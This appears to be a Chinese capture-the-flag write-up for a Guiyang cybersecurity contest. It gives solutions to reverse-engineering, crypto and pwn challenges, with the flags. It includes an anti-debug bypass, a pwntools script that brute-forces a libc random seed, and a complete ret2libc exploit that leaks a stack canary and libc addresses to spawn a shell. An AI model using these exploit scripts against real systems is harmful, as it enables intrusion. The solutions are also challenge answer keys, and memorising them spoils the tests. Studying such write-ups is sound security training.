贵阳大数据及网络安全精英对抗赛-解题赛WP

REVERSE

(如果有佬出了rust的flag，求佬告诉我一下orz，太菜了，没运行出来，验证不了flag，麻烦佬们告诉下orz)

ezre

观察程序，其中有base64、rc4、DES算法，
函数主要逻辑：输入一串字符，前一位和后一位异或，再rc4加密，最后des加密，DES算法给出了加密解密，0x65为加密，0x64为解密

根据动调来做，其中要注意的是tls函数对DES的密钥和输入的数据进行了改动


手动把两个tls函数判断是否调试的地方改一下，绕过反调试，
可以手动patch，也可以改ZF的值，
patch的话可以将74改成75，即可绕过反调试


输入flag{12345678901234567890123456789012}

调试到异或后，

取出数组十六进制数据为，

0A 0D 06 1C 4A 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 01 07 01 03 01 0F 01 09 01 03 4F 7D

经过rc4加密后数据为

3F D8 A0 03 BA 63 83 A7 C6 AC AD B2 D6 25 30 5B 83 88 96 C7 CE B9 22 AC 8D 1F 79 91 7E 73 38 F4 FC 98 CA A9 B7 D4

可用这两个异或，得到xor_key,
将此处的0x65改为0x64,并把最后判断的数组byte_40B078提取出来，

在des解密前，将byte_40B668的数据改为byte_EBB078的值

11 C3 77 FE 6F D2 EB F1 CF 1E 50 4D 70 4C 25 29 
B5 CA 75 DB 8C 19 82 D9 1F E1 5E 58 EB 4B 51 D2 
75 F4 BA 1F 61 0D 45 BD

通过解密后，得到

3F D8 A0 03 E9 63 D2 F2 97 FD A8 B9 87 7B 36 5F D0 8B 91 C5 99 E2 20 A6 DF 4A 2C 93 27 7E 3A F7 FD CD 97 AB BC D4

最后写个脚本逆推出flag

x1=[0x0A, 0x0D, 0x06, 0x1C, 0x4A, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x01, 0x07, 0x01, 0x03, 
  0x01, 0x0F, 0x01, 0x09, 0x01, 0x03, 0x4F, 0x7D]
x2=[0x3F, 0xD8, 0xA0, 0x03, 0xBA, 0x63, 0x83, 0xA7, 0xC6, 0xAC, 
  0xAD, 0xB2, 0xD6, 0x25, 0x30, 0x5B, 0x83, 0x88, 0x96, 0xC7, 
  0xCE, 0xB9, 0x22, 0xAC, 0x8D, 0x1F, 0x79, 0x91, 0x7E, 0x73, 
  0x38, 0xF4, 0xFC, 0x98, 0xCA, 0xA9, 0xB7, 0xD4]
result=[0x3F, 0xD8, 0xA0, 0x03, 0xE9, 0x63, 0xD2, 0xF2, 0x97, 0xFD, 
  0xA8, 0xB9, 0x87, 0x7B, 0x36, 0x5F, 0xD0, 0x8B, 0x91, 0xC5, 
  0x99, 0xE2, 0x20, 0xA6, 0xDF, 0x4A, 0x2C, 0x93, 0x27, 0x7E, 
  0x3A, 0xF7, 0xFD, 0xCD, 0x97, 0xAB, 0xBC, 0xD4]
xor_key=[]

for i in range(len(x1)):
    xor_key.append(x1[i]^x2[i])

for i in range(len(result)):
    result[i]^=xor_key[i]

for i in range(len(result)-2,-1,-1):
    result[i]^=result[i+1]
print(bytes(result))

得到flag{ba1c3aea1faf4067a565f0da97488d89}

rev_randomize2

(赛后在本地复现出的，远程环境关了，不知道远程行不行，如果有误，轻点喷orz，方法比较烂，就硬爆随机数种子，有点废电脑，也有点看运气，随机数种子小的话，就很快)
代码主要逻辑，开始有初始分1000，猜对一个随机数加1分，再猜对一个加2分，依此类推，猜错的话，规律一样，当分数大于2000分，即可得到flag

sub_1289函数初始化随机数种子

sub_12FE获取生成的随机数

然后开跑，这里的libc.so.6是直接用pwn题给的libc，记得在本地建个flag文件，不然跑了半天出了才知道还没有文件(问就是我

from pwn import *
from ctypes import *

context.log_level = "debug"

# p = remote('39.107.71.45', '25568')
p = process('./randomize')
elf = cdll.LoadLibrary('./libc.so.6')

p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
a = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
b = int(p.recvuntil(b'\n')[:-1])
p.recvuntil(b'Now guess!\n')
p.sendline(b'1')
p.recvuntil(b'The number in my mind is ')
c = int(p.recvuntil(b'\n')[:-1])
print(a)
print(b)
print(c)

for i in range(0x10000000, 0x100000000):
    elf.srand(i)
    x = elf.rand() >> 15
    y = elf.rand() >> 15
    z = elf.rand() >> 15
    if x == a and y == b and z==c:
        print(hex(i))
        number=i
        break

elf.srand(number)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
print(elf.rand() >> 15)
score=994
for i in range(100):
    payload = str(elf.rand() >> 15)
    p.sendline(payload.encode())
    score+=(i+1)
    if score>=2000:
    	break
    p.recvuntil(b'Now guess!\n')

p.interactive()

CRYPTO

math

没有时间限制，就直接本地挨个解了，没写交互脚本

import hashlib
import itertools
from string import digits, ascii_letters, punctuation

# alpha_bet=digits+ascii_letters+punctuation
# strlist = itertools.product(alpha_bet, repeat=4)

# sha256="710dd6a2908fed2a9977445f021333d176f39060f3b14c8ebe73ab12d4946461"
# tail="QlRvhN1QqRksWBrG"

# xxxx=''

# for i in strlist:
    # data=i[0]+i[1]+i[2]+i[3]
    # data_sha=hashlib.sha256((data+str(tail)).encode('utf-8')).hexdigest()
    # if(data_sha==str(sha256)):
        # xxxx=data
        # break

# print(xxxx)

# pow(p,9)+pow(q,9): 2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222
# pow(p,3)+pow(q,3): 2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142


from z3 import *
p,q = Ints('p q')
solver = Solver()#创建一个求解器对象
solver.add(pow(p,9)+pow(q,9)==2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222)
solver.add(pow(p,3)+pow(q,3)==2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142)
if solver.check() == sat: #check()方法用来判断是否有解，sat(satisify)表示满足有解
    ans = solver.model() #model()方法得到解
    p1=ans[p].as_long()
    q1=ans[q].as_long()
    print(ans)
    print(p1)
    print(q1)
else:
    print("no ans!")
    
print((p1*q1) % (p1+q1))

PWN

ezstack

利用栈溢出和canary泄露的漏洞ret2libc

from pwn import *

context(arch="amd64", os="linux", log_level='debug')

e = ELF("./pwn2")
libc = ELF("libc.so.6")

p = remote('123.56.175.221', '17322')

puts_plt_addr = e.symbols["puts"]
puts_got_addr = e.got["puts"]
main_addr = e.symbols["main"]
rdi_addr = 0x401363
ret = 0x401364

p.sendline(b'a' * (0x30 - 10) + b'b')
p.recvuntil(b'b\n')
canary = u64(p.recv(8))
print(hex(canary))

payload = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(rdi_addr) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)
p.sendlineafter(b'input: \n', payload)

puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

base_addr = puts_addr - libc.sym['puts']
system_addr = base_addr + libc.sym['system']
binsh_addr = base_addr + next(libc.search(b'/bin/sh'))
print(hex(system_addr))
print(hex(binsh_addr))

payload2 = b'a' * (0x30 - 8) + p64(canary) + p64(0) + p64(ret) + p64(rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter(b'input: \n', payload2)
p.interactive()

拿到权限后，得到flag，flag{nEsqteUbHFuy8mQTNXH7abj43C5Q4NQG}文章来源地址https://www.toymoban.com/news/detail-743886.html

到了这里，关于贵阳大数据及网络安全精英对抗赛-解题赛WP的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！